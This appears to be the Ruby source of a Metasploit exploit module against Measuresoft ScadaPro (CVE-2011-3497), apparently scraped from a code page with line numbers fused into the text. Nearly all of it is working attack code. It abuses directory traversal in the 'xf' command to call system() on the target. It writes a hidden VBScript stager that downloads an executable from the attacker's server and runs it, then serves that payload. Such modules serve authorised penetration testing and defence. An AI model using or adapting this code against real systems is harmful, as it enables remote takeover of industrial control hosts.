Path: blob/master/modules/exploits/windows/scada/scadapro_cmdexe.rb
19513 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::Remote::Tcp10include Msf::Exploit::EXE1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Measuresoft ScadaPro Remote Command Execution',17'Description' => %q{18This module allows remote attackers to execute arbitrary commands on the19affected system by abusing via Directory Traversal attack when using the20'xf' command (execute function). An attacker can execute system() from21msvcrt.dll to upload a backdoor and gain remote code execution. This22vulnerability affects version 4.0.0 and earlier.23},24'License' => MSF_LICENSE,25'Author' => [26'Luigi Auriemma', # Initial discovery/poc27'mr_me <steventhomasseeley[at]gmail.com>', # msf28'TecR0c <tecr0c[at]tecninja.net>', # msf29],30'References' => [31[ 'CVE', '2011-3497'],32[ 'OSVDB', '75490'],33[ 'BID', '49613'],34[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],35[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],36# seemed pretty accurate to us ;)37[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],38],39'DefaultOptions' => {40'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',41},42'Platform' => 'win',43'Targets' => [44# truly universal45[ 'Automatic', {} ],46],47'DefaultTarget' => 0,48'DisclosureDate' => '2011-09-16',49'Notes' => {50'Reliability' => UNKNOWN_RELIABILITY,51'Stability' => UNKNOWN_STABILITY,52'SideEffects' => UNKNOWN_SIDE_EFFECTS53}54)55)5657register_options(58[59Opt::RPORT(11234),60OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),61]62)63end6465# couldn't generate a vbs or exe payload and then use the wF command66# as there is a limit to the amount of data to write to disk.67# so we just write out a vbs script like the old days.6869def build_vbs(url, stager_name)70name_xmlhttp = rand_text_alpha(2)71name_adodb = rand_text_alpha(2)7273tmp = "#{@temp_folder}/#{stager_name}"7475vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "76vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"77vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "78vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "79vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "80vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "81vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"8283return vbs84end8586def on_request_uri(cli, request)87if request.uri =~ /\.exe/88print_status("Sending 2nd stage payload")89return if ((p = regenerate_payload(cli)) == nil)9091data = generate_payload_exe({ :code => p.encoded })92send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })93return94end95end9697def exploit98# In order to save binary data to the file system the payload is written to a .vbs99# file and execute it from there.100@payload_name = rand_text_alpha(4)101@temp_folder = "C:/Windows/Temp"102103if datastore['SRVHOST'] == '0.0.0.0'104lhost = Rex::Socket.source_address('50.50.50.50')105else106lhost = datastore['SRVHOST']107end108109payload_src = lhost110payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"111112stager_name = rand_text_alpha(6) + ".vbs"113stager = build_vbs(payload_src, stager_name)114115path = "..\\..\\..\\..\\..\\windows\\system32"116117createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"118download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"119120print_status("Sending 1st stage payload...")121122connect123sock.get_once()124sock.put(createvbs)125sock.get_once()126sock.put(download_execute)127handler()128disconnect129130super131end132end133134135